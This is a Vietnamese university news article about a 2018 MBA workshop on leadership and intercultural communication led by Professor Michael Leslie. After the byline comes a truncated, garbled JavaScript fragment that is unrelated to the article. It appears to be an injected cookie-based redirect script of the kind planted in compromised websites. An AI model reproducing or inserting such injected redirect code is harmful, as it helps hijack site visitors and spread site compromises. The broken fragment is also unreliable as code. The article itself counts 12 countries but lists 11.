Hội thảo “Lãnh đạo và truyền thông đa văn hóa” dành cho học viên MBA

Michael Leslie Ph.DHội thảo nằm trong khuôn khổ của chương trình đào tạo Thạc sĩ Quản trị Kinh doanh (HSB – MBA) và được tổ chức thường kỳ.

Ngày 28/7/2018, Khoa Quản trị và Kinh doanh (HSB) – ĐHQGHN đã tổ chức buổi Hội thảo mang chủ đề “Leadership and Intercultural communication” với sự chia sẻ của diễn giả, PGS.TS.Michael Leslie. Hội thảo nằm trong khuôn khổ của chương trình đào tạo Thạc sĩ Quản trị Kinh doanh (HSB – MBA) và được tổ chức thường kỳ dành cho các nhà nghiên cứu và học viên của chương trình.

Tại Hội thảo, PGS.TS.Michael Leslie đã mang đến một cách tiếp cận mới về toàn cảnh văn hóa các quốc gia, trong đó nhấn mạnh những khó khăn và khác biệt văn hóa kinh doanh giữa Việt Nam và Mỹ. Đó là những điểm quan trọng mà các nhà quản trị cần lưu ý trong quá trình đàm phán, hợp tác kinh doanh quốc tế. Các học viên tham gia hội thảo đã thực hiện casestudies liên quan đến chủ đề Cultural Communication và ứng dụng vào môn học cũng như thực tế công việc.

PGS.TS.Michael Leslie cũng đã có buổi trao đổi với BCN Khoa và giảng viên về học thuật, chia sẻ kinh nghiệm để tạo cảm hứng học tập và truyền lửa cho học viên.

PGS.TS.Michael Leslie hiện đang công tác tại Trường Báo chí và Quan hệ công chúng, trực thuộc Đại học Florida – Mỹ. Ông là chuyên gia với nhiều năm kinh nghiệm nghiên cứu và giảng dạy về Lãnh đạo, Trách nhiệm xã hội của Doanh nghiệp và Giao tiếp liên văn hóa quốc tế. PGS.TS.Michael Leslie đã tham gia giảng dạy và nghiên cứu tại 12 nước trên thế giới bao gồm: Trung Quốc, Ấn Độ, Bỉ, Pháp, Mexico, Cuba, Brazil, Zambia, Nam Phi, Mozambique và Angola. Đặc biệt, PGS.TS.Michael Leslie đã đồng ý nhận lời mời tham gia giảng dạy chương trình Thạc sĩ Quản trị Kinh doanh (HSB – MBA) tại Khoa Quản trị và Kinh doanh.

Nguyên Minh

{var U=(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’